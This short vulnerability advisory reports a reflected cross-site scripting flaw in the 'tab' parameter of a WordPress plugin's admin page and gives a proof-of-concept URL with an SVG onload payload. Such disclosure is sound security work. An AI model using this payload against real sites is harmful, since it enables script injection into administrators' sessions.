The plugin does not sanitize and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/options-general.php?page=dtabs.php&action=edit&tab="><svg/onload=alert(/XSS/)>